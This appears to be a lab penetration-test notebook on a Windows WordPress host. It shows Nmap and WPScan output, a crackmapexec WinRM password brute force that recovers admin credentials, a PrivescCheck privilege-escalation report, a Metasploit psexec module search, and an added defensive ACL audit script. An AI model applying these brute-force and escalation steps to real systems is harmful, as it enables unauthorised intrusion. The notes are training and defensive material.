🌐 WordPress
IP: 192.168.100.50
Nmap Scans
Nmap scan report for ip-192-168-100-50.ap-south-1.compute.internal (192.168.100.50)
Host is up (0.00063s latency).
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.51 ((Win64) PHP/7.4.26)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3307/tcp open opsession-prxy?
3389/tcp open ssl/ms-wbt-server?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49178/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3307-TCP:V=7.92%I=7%D=3/24%Time=641DD6E7%P=x86_64-pc-linux-gnu%r(NU
SF:LL,6B,"g\0\0\x01\xffj\x04Host\x20'ip-192-168-100-5\.ap-south-1\.compute
SF:\.internal'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20M
SF:ariaDB\x20server");
MAC Address: 02:8D:D6:7A:B4:22 (Unknown)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
What is the name of the active theme on the WordPress site? (http://192.168.100.50/home)
Spintech or Burgertheme

SMB Enumeration.
SMB Version

RDP Enumeration.

WinRM Credentials / Initial Foothold

root@kali:~# crackmapexec winrm 192.168.100.50 -u /usr/share/wordlists/metasploit/unix_users.txt -p /usr/share/wordlists/metasploit/unix_passwords.txt
WINRM 192.168.100.50 5985 NONE [+] None\admin:superman (Pwn3d!)
Directory Enumeration.
192.168.100.50/phpmyadmin/ -> phpMyAdmin login page.
WPScan Results.
root@kali:~# wpscan --url http://wordpress.local -e ap,at,vt
_______________________________________________________________
WordPress Security Scanner by the WPScan Team
Version 3.8.18
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: <http://wordpress.local/> [192.168.100.50]
[+] Started: Sat Mar 25 07:19:11 2023
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.51 (Win64) PHP/7.4.26
| - X-Powered-By: PHP/7.4.26
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: <http://wordpress.local/xmlrpc.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - <http://codex.wordpress.org/XML-RPC_Pingback_API>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/>
| - <https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/>
[+] WordPress readme found: <http://wordpress.local/readme.html>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: <http://wordpress.local/wp-content/uploads/>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: <http://wordpress.local/wp-cron.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - <https://www.iplocation.net/defend-wordpress-from-ddos>
| - <https://github.com/wpscanteam/wpscan/issues/1299>
[+] WordPress version 5.9.3 identified (Latest, released on 2022-04-05).
| Found By: Emoji Settings (Passive Detection)
| - <http://wordpress.local/>, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.9.3'
| Confirmed By: Meta Generator (Passive Detection)
| - <http://wordpress.local/>, Match: 'WordPress 5.9.3'
[+] WordPress theme in use: spintech
| Location: <http://wordpress.local/wp-content/themes/spintech/>
| Latest Version: 1.0.33 (up to date)
| Last Updated: 2022-03-28T00:00:00.000Z
| Readme: <http://wordpress.local/wp-content/themes/spintech/readme.txt>
| Style URL: <http://wordpress.local/wp-content/themes/spintech/style.css?ver=5.9.3>
| Style Name: Spintech
| Style URI: <https://burgerthemes.com/spintech-free/>
| Description: Spintech WordPress theme is specially designed for an IT & Software Company. Theme is perfectly for ...
| Author: burgersoftware
| Author URI: <https://burgerthemes.com/>
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0.33 (80% confidence)
| Found By: Style (Passive Detection)
| - <http://wordpress.local/wp-content/themes/spintech/style.css?ver=5.9.3>, Match: 'Version: 1.0.33'
[+] Enumerating Vulnerable Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] No plugins Found.
[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:13 <=============================================================================================================> (468 / 468) 100.00% Time: 00:00:13
[+] Checking Theme Versions (via Passive and Aggressive Methods)
[i] No themes Found.
[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:08 <===========================================================================================================> (2575 / 2575) 100.00% Time: 00:00:08
[i] No Timthumbs Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:02 <==============================================================================================================> (137 / 137) 100.00% Time: 00:00:02
[i] No Config Backups Found.
[+] Enumerating DB Exports (via Passive and Aggressive Methods)
Checking DB Exports - Time: 00:00:00 <====================================================================================================================> (68 / 68) 100.00% Time: 00:00:00
[i] No DB Exports Found.
[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
Brute Forcing Attachment IDs - Time: 00:00:02 <=========================================================================================================> (100 / 100) 100.00% Time: 00:00:02
[i] No Medias Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===============================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at <https://wpscan.com/register>
[+] Finished: Sat Mar 25 07:20:22 2023
[+] Requests Done: 3873
[+] Cached Requests: 9
[+] Data Sent: 1.061 MB
[+] Data Received: 1.162 MB
[+] Memory used: 274.82 MB
[+] Elapsed time: 00:01:11
Post Exploitation
Local Users Enumeration.

PrivescCheck
C:\temp>powershell -ep bypass -c ". .\pecheck.ps1; Invoke-PrivescCheck"
+------+------------------------------------------------+------+
| TEST | USER > Identity | INFO |
+------+------------------------------------------------+------+
| DESC | Get the full name of the current user (domain + |
| | username) along with the associated Security |
| | Identifier (SID). |
+------+-------------------------------------------------------+
[*] Found 1 result(s).
Name : WINSERVER-01\admin
SID : S-1-5-21-2202681729-75510020-2229350343-1011
IntegrityLevel : Medium Mandatory Level (S-1-16-8192)
SessionId : 2
TokenId : 00000000-0015dd5e
AuthenticationId : 00000000-00094f83
OriginId : 00000000-000003e7
ModifiedId : 00000000-0015c100
Source : User32 (00000000-00094f48)
+------+------------------------------------------------+------+
| TEST | USER > Groups | INFO |
+------+------------------------------------------------+------+
| DESC | List all the groups that are associated to the |
| | current user's token. |
+------+-------------------------------------------------------+
[*] Found 14 result(s).
Name                                                             Type
----                                                             ----
WINSERVER-01\None                                                Group
Everyone                                                         WellKnownGroup
NT AUTHORITY\Local account and member of Administrators group    WellKnownGroup
BUILTIN\Administrators                                           Alias
BUILTIN\Users                                                    Alias
NT AUTHORITY\REMOTE INTERACTIVE LOGON                            WellKnownGroup
NT AUTHORITY\INTERACTIVE                                         WellKnownGroup
NT AUTHORITY\Authenticated Users                                 WellKnownGroup
NT AUTHORITY\This Organization                                   WellKnownGroup
NT AUTHORITY\Local account                                       WellKnownGroup
(one row lost in the capture)
LOCAL                                                            WellKnownGroup
NT AUTHORITY\NTLM Authentication                                 WellKnownGroup
Mandatory Label\Medium Mandatory Level                           Label
(SID column truncated in the capture)
+------+------------------------------------------------+------+
| TEST | USER > Privileges | INFO |
+------+------------------------------------------------+------+
| DESC | List the current user's privileges and identify the |
| | ones that can be leveraged for local privilege |
| | escalation. |
+------+-------------------------------------------------------+
[*] Found 5 result(s).
Name                            State    Description
----                            -----    -----------
SeShutdownPrivilege             Enabled  Shut down the system
SeChangeNotifyPrivilege         Enabled  Bypass traverse checking
SeUndockPrivilege               Enabled  Remove computer from docking station
SeIncreaseWorkingSetPrivilege   Enabled  Increase a process working set
SeTimeZonePrivilege             Enabled  Change the time zone
(Exploitable column truncated in the capture)
+------+------------------------------------------------+------+
| TEST | USER > Environment Variables | INFO |
+------+------------------------------------------------+------+
| DESC | List the environment variables of the current process |
| | and try to identify any potentially sensitive |
| | information such as passwords or API secrets. This |
| | check is simply based on keyword matching and might |
| | not be entirely reliable. |
+------+-------------------------------------------------------+
[!] Nothing found.
+------+------------------------------------------------+------+
| TEST | SERVICES > Non-default Services | INFO |
+------+------------------------------------------------+------+
| DESC | List all registered services and filter out the ones |
| | that are built into Windows. It does so by parsing |
| | the target executable's metadata. |
+------+-------------------------------------------------------+
[*] Found 27 result(s).
Name : ALG
DisplayName : @C:\Windows\system32\Alg.exe,-112
ImagePath : C:\Windows\System32\alg.exe
User : NT AUTHORITY\LocalService
StartMode : Manual

Name : AmazonSSMAgent
DisplayName : Amazon SSM Agent
ImagePath : "C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"
User : LocalSystem
StartMode : Automatic

Name : AWSLiteAgent
DisplayName : AWS Lite Guest Agent
ImagePath : "C:\Program Files\Amazon\XenTools\LiteAgent.exe"
User : LocalSystem
StartMode : Automatic

Name : cfn-hup
DisplayName : CloudFormation cfn-hup
ImagePath : "C:\Program Files\Amazon\cfn-bootstrap\winhup.exe"
User : LocalSystem
StartMode : Manual

Name : Ec2Config
DisplayName : Ec2Config
ImagePath : "C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe"
User : LocalSystem
StartMode : Automatic

Name : EFS
DisplayName : @C:\Windows\system32\efssvc.dll,-100
ImagePath : C:\Windows\System32\lsass.exe
User : LocalSystem
StartMode : Manual

Name : GoogleChromeElevationService
DisplayName : Google Chrome Elevation Service (GoogleChromeElevationService)
ImagePath : "C:\Program Files\Google\Chrome\Application\100.0.4896.127\elevation_service.exe"
User : LocalSystem
StartMode : Manual

Name : gupdate
DisplayName : Google Update Service (gupdate)
ImagePath : "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
User : LocalSystem
StartMode : Automatic

Name : gupdatem
DisplayName : Google Update Service (gupdatem)
ImagePath : "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc
User : LocalSystem
StartMode : Manual

Name : HttpdService
DisplayName : Httpd Service
ImagePath : C:\Users\Administrator\Downloads\847d772037159c4559bd41a439489ee7-minihttpd120\minihttpd\httpd.exe
User : LocalSystem
StartMode : Automatic

Name : IEEtwCollectorService
DisplayName : @C:\Windows\system32\ieetwcollectorres.dll,-1000
ImagePath : C:\Windows\system32\IEEtwCollector.exe /V
User : LocalSystem
StartMode : Manual

Name : KeyIso
DisplayName : @keyiso.dll,-100
ImagePath : C:\Windows\system32\lsass.exe
User : LocalSystem
StartMode : Manual

Name : MSDTC
DisplayName : @comres.dll,-2797
ImagePath : C:\Windows\System32\msdtc.exe
User : NT AUTHORITY\NetworkService
StartMode : Automatic

Name : Netlogon
DisplayName : @C:\Windows\System32\netlogon.dll,-102
ImagePath : C:\Windows\system32\lsass.exe
User : LocalSystem
StartMode : Manual

Name : RpcLocator
DisplayName : @C:\Windows\system32\Locator.exe,-2
ImagePath : C:\Windows\system32\locator.exe
User : NT AUTHORITY\NetworkService
StartMode : Manual

Name : SamSs
DisplayName : @C:\Windows\system32\samsrv.dll,-1
ImagePath : C:\Windows\system32\lsass.exe
User : LocalSystem
StartMode : Automatic

Name : SNMPTRAP
DisplayName : @C:\Windows\system32\snmptrap.exe,-3
ImagePath : C:\Windows\System32\snmptrap.exe
User : NT AUTHORITY\LocalService
StartMode : Manual

Name : Spooler
DisplayName : @C:\Windows\system32\spoolsv.exe,-1
ImagePath : C:\Windows\System32\spoolsv.exe
User : LocalSystem
StartMode : Automatic

Name : sppsvc
DisplayName : @C:\Windows\system32\sppsvc.exe,-101
ImagePath : C:\Windows\system32\sppsvc.exe
User : NT AUTHORITY\NetworkService
StartMode : Automatic

Name : TieringEngineService
DisplayName : @C:\Windows\system32\TieringEngineService.exe,-702
ImagePath : C:\Windows\system32\TieringEngineService.exe
User : localSystem
StartMode : Manual

Name : UI0Detect
DisplayName : @C:\Windows\system32\ui0detect.exe,-101
ImagePath : C:\Windows\system32\UI0Detect.exe
User : LocalSystem
StartMode : Manual

Name : VaultSvc
DisplayName : @C:\Windows\system32\vaultsvc.dll,-1003
ImagePath : C:\Windows\system32\lsass.exe
User : LocalSystem
StartMode : Manual

Name : vds
DisplayName : @C:\Windows\system32\vds.exe,-100
ImagePath : C:\Windows\System32\vds.exe
User : LocalSystem
StartMode : Manual

Name : VSS
DisplayName : @C:\Windows\system32\vssvc.exe,-102
ImagePath : C:\Windows\system32\vssvc.exe
User : LocalSystem
StartMode : Manual

Name : wampapache64
DisplayName : wampapache64
ImagePath : "c:\wamp64\bin\apache\apache2.4.51\bin\httpd.exe" -k runservice
User : LocalSystem
StartMode : Automatic

Name : wampmariadb64
DisplayName : wampmariadb64
ImagePath : "c:\wamp64\bin\mariadb\mariadb10.6.5\bin\mysqld.exe" "wampmariadb64"
User : LocalSystem
StartMode : Automatic

Name : wmiApSrv
DisplayName : @C:\Windows\system32\wbem\wmiapsrv.exe,-110
ImagePath : C:\Windows\system32\wbem\WmiApSrv.exe
User : localSystem
StartMode : Manual
+------+------------------------------------------------+------+
| TEST | SERVICES > Service Permissions | VULN |
+------+------------------------------------------------+------+
| DESC | Interact with the Service Control Manager (SCM) and |
| | check whether the current user can modify any |
| | registered service. |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | SERVICES > Registry Permissions | VULN |
+------+------------------------------------------------+------+
| DESC | Parse the registry and check whether the current user |
| | can modify the configuration of any registered |
| | service. |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | SERVICES > Binary Permissions | VULN |
+------+------------------------------------------------+------+
| DESC | List all services and check whether the current user |
| | can modify the target executable or write files in |
| | its parent folder. |
+------+-------------------------------------------------------+
[*] Found 5 result(s).
Name : HttpdService
ImagePath : C:\Users\Administrator\Downloads\847d772037159c4559bd41a439489ee7-minihttpd120\minihttpd\httpd.exe
User : LocalSystem
ModifiablePath : C:\Users\Administrator\Downloads
IdentityReference : WINSERVER-01\admin
Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ListDirectory, AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, AddFile, ReadExtendedAttributes, DeleteChild, Traverse
Status : Stopped
UserCanStart : False
UserCanStop : False

Name : wampapache64
ImagePath : "c:\wamp64\bin\apache\apache2.4.51\bin\httpd.exe" -k runservice
User : LocalSystem
ModifiablePath : C:\wamp64\bin\apache\apache2.4.51\bin
IdentityReference : BUILTIN\Users
Permissions : AddSubdirectory
Status : Running
UserCanStart : False
UserCanStop : False

Name : wampapache64
ImagePath : "c:\wamp64\bin\apache\apache2.4.51\bin\httpd.exe" -k runservice
User : LocalSystem
ModifiablePath : C:\wamp64\bin\apache\apache2.4.51\bin
IdentityReference : BUILTIN\Users
Permissions : AddFile
Status : Running
UserCanStart : False
UserCanStop : False

Name : wampmariadb64
ImagePath : "c:\wamp64\bin\mariadb\mariadb10.6.5\bin\mysqld.exe" "wampmariadb64"
User : LocalSystem
ModifiablePath : C:\wamp64\bin\mariadb\mariadb10.6.5\bin
IdentityReference : BUILTIN\Users
Permissions : AddSubdirectory
Status : Running
UserCanStart : False
UserCanStop : False

Name : wampmariadb64
ImagePath : "c:\wamp64\bin\mariadb\mariadb10.6.5\bin\mysqld.exe" "wampmariadb64"
User : LocalSystem
ModifiablePath : C:\wamp64\bin\mariadb\mariadb10.6.5\bin
IdentityReference : BUILTIN\Users
Permissions : AddFile
Status : Running
UserCanStart : False
UserCanStop : False
+------+------------------------------------------------+------+
| TEST | SERVICES > Unquoted Path | VULN |
+------+------------------------------------------------+------+
| DESC | List registered services and check whether any of |
| | them is configured with an unquoted path that can be |
| | exploited. |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | SERVICES > SCM Permissions | VULN |
+------+------------------------------------------------+------+
| DESC | Check whether the current user can perform any |
| | privileged actions on the Service Control Manager |
| | (SCM). |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | CREDS > SAM/SYSTEM/SECURITY Files | VULN |
+------+------------------------------------------------+------+
| DESC | Check whether the SAM/SYSTEM/SECURITY files are |
| | configured with weak permissions, allowing a |
| | low-privileged user to read them - HiveNightmare |
| | (CVE-2021-36934). |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | CREDS > SAM/SYSTEM/SECURITY in shadow copies | VULN |
+------+------------------------------------------------+------+
| DESC | Check whether the SAM/SYSTEM/SECURITY files in shadow |
| | copies are configured with weak permissions, allowing |
| | a low-privileged user to read them. Can happen when |
| | HiveNightmare (CVE-2021-36934) mitigations have not |
| | been applied manually. |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | CREDS > Unattend Files | VULN |
+------+------------------------------------------------+------+
| DESC | Locate 'Unattend' files and check whether they |
| | contain any clear-text credentials. |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | CREDS > WinLogon | VULN |
+------+------------------------------------------------+------+
| DESC | Parse the Winlogon registry keys and check whether |
| | they contain any clear-text password. Entries that |
| | have an empty password field are filtered out. |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | CREDS > GPP Passwords | VULN |
+------+------------------------------------------------+------+
| DESC | Locate old cached Group Policy Preference files that |
| | contain a 'cpassword' field and extract the |
| | clear-text credentials. |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | HARDENING > Credential Guard | INFO |
+------+------------------------------------------------+------+
| DESC | Checks whether Credential Guard is supported and |
| | enabled. |
+------+-------------------------------------------------------+
[*] Found 1 result(s).
Name : Credential Guard
DeviceGuardSecurityServicesConfigured : (null)
DeviceGuardSecurityServicesRunning : (null)
Description : Credential Guard is not supported on this OS
Compliance : False
+------+------------------------------------------------+------+
| TEST | HARDENING > BitLocker | INFO |
+------+------------------------------------------------+------+
| DESC | Check whether BitLocker is configured and enabled on |
| | the system drive. Note that this check will yield a |
| | false positive if another encryption software is in |
| | use. |
+------+-------------------------------------------------------+
+------+------------------------------------------------+------+
| TEST | CONFIG > PATH Folder Permissions | VULN |
+------+------------------------------------------------+------+
| DESC | Retrieve the list of SYSTEM %PATH% folders and check |
| | whether the current user has some write permissions |
| | in any of them. |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | MISC > Hijackable DLLs | INFO |
+------+------------------------------------------------+------+
| DESC | List Windows services that are prone to Ghost DLL |
| | hijacking. This is particularly relevant if the |
| | current user can create files in one of the SYSTEM |
| | %PATH% folders. |
+------+-------------------------------------------------------+
[*] Found 3 result(s).
Name : windowsperformancerecordercontrol.dll
Description : Loaded by DiagTrack upon service startup or shutdown
RunAs : LocalSystem
RebootRequired : True
Name : diagtrack_win.dll
Description : Loaded by DiagTrack upon service startup
RunAs : LocalSystem
RebootRequired : True
Name : wlanapi.dll
Description : Loaded by NetMan when listing network interfaces
RunAs : LocalSystem
RebootRequired : False
+------+------------------------------------------------+------+
| TEST | CONFIG > AlwaysInstallElevated | VULN |
+------+------------------------------------------------+------+
| DESC | Check whether the 'AlwaysInstallElevated' registry |
| | keys are configured and enabled. If so any user might |
| | be able to run arbitary MSI files with SYSTEM |
| | privileges. |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | CONFIG > WSUS Configuration | VULN |
+------+------------------------------------------------+------+
| DESC | If WSUS is configured and enabled, check whether the |
| | service uses an insecure URL (http://*). If so, it |
| | might be vulnerable to MitM attacks. Note that in |
| | case of local exploitation, the value of |
| | 'SetProxyBehaviorForUpdateDetection' determines |
| | whether the service uses the system or user proxy |
| | settings. |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | CONFIG > Hardened UNC Paths | VULN |
+------+------------------------------------------------+------+
| DESC | Check hardened UNC paths. If not properly configured, |
| | a Man-in-the-Middle might be able to run arbitrary |
| | code with SYSTEM privileges by injecting malicious |
| | group policies during a group policy update (SYSVOL |
| | only). |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | CONFIG > SCCM Cache Folder (info) | INFO |
+------+------------------------------------------------+------+
| DESC | Checks whether the SCCM cache folder exists. Manual |
| | investigation might be required during |
| | post-exploitation. |
+------+-------------------------------------------------------+
[!] Nothing found.
+------+------------------------------------------------+------+
| TEST | CONFIG > SCCM Cache Folder | VULN |
+------+------------------------------------------------+------+
| DESC | Checks whether the current user can browse the SCCM |
| | cache folder. If so, hardcoded credentials might be |
| | extracted from MSI package files or scripts. |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | CONFIG > Point and Print | VULN |
+------+------------------------------------------------+------+
| DESC | Checks whether the Print Spooler service is enabled |
| | and if the Point and Print configuration allows |
| | low-privileged users to install printer drivers. |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | CONFIG > Driver Co-Installers | INFO |
+------+------------------------------------------------+------+
| DESC | Check whether the 'DisableCoInstallers' registry key |
| | is absent or disabled. If so any user might be able |
| | to run arbitrary code with SYSTEM privileges by |
| | plugging a device automatically installing vulnerable |
| | software along with its driver. |
+------+-------------------------------------------------------+
[*] Found 1 result(s).
Key : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Device Installer
Value : DisableCoInstallers
Data : (null)
Description : CoInstallers are enabled (default)
Compliance : False
+------+------------------------------------------------+------+
| TEST | UPDATES > System up to date? | VULN |
+------+------------------------------------------------+------+
| DESC | Enumerate the installed updates and hotfixes and |
| | check whether a patch was applied in the last 31 |
| | days. |
+------+-------------------------------------------------------+
[*] Found 1 result(s).
HotFixID Description InstalledBy InstalledOn
-------- ----------- ----------- -----------
KB4503276 Security Update WINSERVER-01\Administrator 2022-04-18 - 00:00:00
+------+------------------------------------------------+------+
| TEST | MISC > User session list | INFO |
+------+------------------------------------------------+------+
| DESC | Enumerate the sessions of the currently logged-on |
| | users. It might be possible to capture or relay the |
| | NTLM/Kerberos authentication of these users |
| | (RemotePotato0, KrbRelay). |
+------+-------------------------------------------------------+
[*] Found 3 result(s).
SessionName UserName Id State
----------- -------- -- -----
Services 0 Disconnected
Console 1 Connected
RDP-Tcp#39 WINSERVER-01\admin 2 Active
+-----------------------------------------------------------------------------+
| ~~~ PrivescCheck Report ~~~ |
+----+------+-----------------------------------------------------------------+
| OK | None | CONFIG > Hardened UNC Paths |
| NA | None | CONFIG > SCCM Cache Folder (info) |
| OK | None | CONFIG > PATH Folder Permissions |
| OK | None | CONFIG > WSUS Configuration |
| NA | None | CONFIG > Driver Co-Installers -> 1 result(s) |
| OK | None | CONFIG > AlwaysInstallElevated |
| OK | None | CONFIG > SCCM Cache Folder |
| OK | None | CONFIG > Point and Print |
| OK | None | CREDS > SAM/SYSTEM/SECURITY in shadow copies |
| OK | None | CREDS > GPP Passwords |
| OK | None | CREDS > Unattend Files |
| OK | None | CREDS > WinLogon |
| OK | None | CREDS > SAM/SYSTEM/SECURITY Files |
| NA | None | HARDENING > Credential Guard -> 1 result(s) |
| NA | None | MISC > Hijackable DLLs -> 3 result(s) |
| NA | None | MISC > User session list -> 3 result(s) |
| OK | None | SERVICES > Registry Permissions |
| OK | None | SERVICES > Service Permissions |
| NA | None | SERVICES > Non-default Services -> 27 result(s) |
| OK | None | SERVICES > SCM Permissions |
| OK | None | SERVICES > Unquoted Path |
| KO | High | SERVICES > Binary Permissions -> 5 result(s) |
| KO | Med. | UPDATES > System up to date? -> 1 result(s) |
| NA | None | USER > Identity -> 1 result(s) |
| NA | None | USER > Groups -> 14 result(s) |
| NA | None | USER > Environment Variables |
| NA | None | USER > Privileges -> 5 result(s) |
+----+------+-----------------------------------------------------------------+
WARNING: To get more info, run this script with the option '-Extended'.
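As a defender-side counterpart to the Binary Permissions finding above (BUILTIN\Users holding AddFile/AddSubdirectory on the wamp64 bin folders, and HttpdService running out of a user-writable Downloads folder), here is an added audit script; it is not PrivescCheck's code and not part of the original notes. It enumerates every service, extracts the executable from the ImagePath, and reports any write-type ACE that a well-known low-privileged principal holds on the binary or its folder (PrivescCheck instead checks from the current user's perspective); the principal list and the icacls remediation line are assumptions for this lab host.

```powershell
# Added audit example, not PrivescCheck's code. Run from an elevated PowerShell
# so that every service binary and folder ACL can be read.

# Constructed list of principals that should never hold write rights on a
# service binary or its folder (assumption for this host; extend as needed).
$LowPrivPrincipals = @(
    'BUILTIN\Users',
    'Everyone',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that let a principal replace or add an executable in the folder.
# CreateFiles/CreateDirectories are what PrivescCheck reports as AddFile and
# AddSubdirectory; the rest allow deleting, re-ACLing or taking ownership.
$WriteRights = [System.Security.AccessControl.FileSystemRights](
    'CreateFiles, CreateDirectories, WriteAttributes, WriteExtendedAttributes, ' +
    'Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership, FullControl')

function Get-ServiceBinaryPath {
    # Extract the executable from a service ImagePath such as
    #   "C:\Program Files\X\svc.exe" -k runservice   or   C:\Windows\system32\alg.exe /svc
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    $p = [Environment]::ExpandEnvironmentVariables($PathName.Trim())
    if ($p.StartsWith('"')) {
        $end = $p.IndexOf('"', 1)
        if ($end -gt 1) { return $p.Substring(1, $end - 1) }
        return $p.Trim('"')
    }
    # Unquoted: take everything up to the first ".exe" token, spaces included
    # (the same shape the Unquoted Path check above looks for).
    $m = [regex]::Match($p, '^(.*?\.exe)(\s|$)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return ($p -split '\s+')[0]
}

function Get-LowPrivWriteAces {
    # Return the Allow ACEs on $Path that grant a low-privileged principal any
    # of the write rights above. Generic rights show up as raw integers and are
    # not matched here; review such entries by hand.
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return @() }
    $hits = @()
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band [int]$WriteRights) -ne 0) {
            $hits += [pscustomobject]@{
                Identity = $ace.IdentityReference.Value
                Rights   = $ace.FileSystemRights
            }
        }
    }
    return $hits
}

# Check both the executable itself and its parent folder for every service.
$findings = foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    $exe = Get-ServiceBinaryPath $svc.PathName
    if (-not $exe) { continue }
    $dir = Split-Path -Path $exe -Parent
    foreach ($target in @($exe, $dir)) {
        foreach ($hit in (Get-LowPrivWriteAces $target)) {
            [pscustomobject]@{
                Service  = $svc.Name
                RunsAs   = $svc.StartName
                Target   = $target
                Identity = $hit.Identity
                Rights   = $hit.Rights
            }
        }
    }
}

if ($findings) {
    $findings | Format-Table -AutoSize
} else {
    Write-Output 'No service binary or folder is writable by a low-privileged principal.'
}

# Remediation for a hit such as the wamp64 bin folder (path taken from the notes
# above): replace the write grant with read-and-execute, then restart the service.
#   icacls "C:\wamp64\bin\apache\apache2.4.51\bin" /grant:r "BUILTIN\Users:(OI)(CI)RX"
```

A service whose binary lives under a user profile (like HttpdService here) should be relocated to a folder only Administrators and SYSTEM can write, since no ACL fix on Downloads is durable.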
Getting shell via meterpreter using psexec
msf6 > search psexec
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/smb/impacket/dcomexec 2018-03-19 normal No DCOM Exec
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/psexec_loggedin_users normal No Microsoft Windows Authenticated Logged In Users Enumeration
4 exploit/windows/smb/psexec 1999-01-01 manual No Microsoft Windows Authenticated User Code Execution
5 auxiliary/admin/smb/psexec_ntdsgrab normal No PsExec NTDS.dit And SYSTEM Hive Download Utility
6 exploit/windows/local/current_user_psexec 1999-01-01 excellent No PsExec via Current User Token
7 encoder/x86/service manual No Register Service
8 auxiliary/scanner/smb/impacket/wmiexec 2018-03-19 normal No WMI Exec
9 exploit/windows/smb/webexec 2018-10-24 manual No WebExec Authenticated User Code Execution
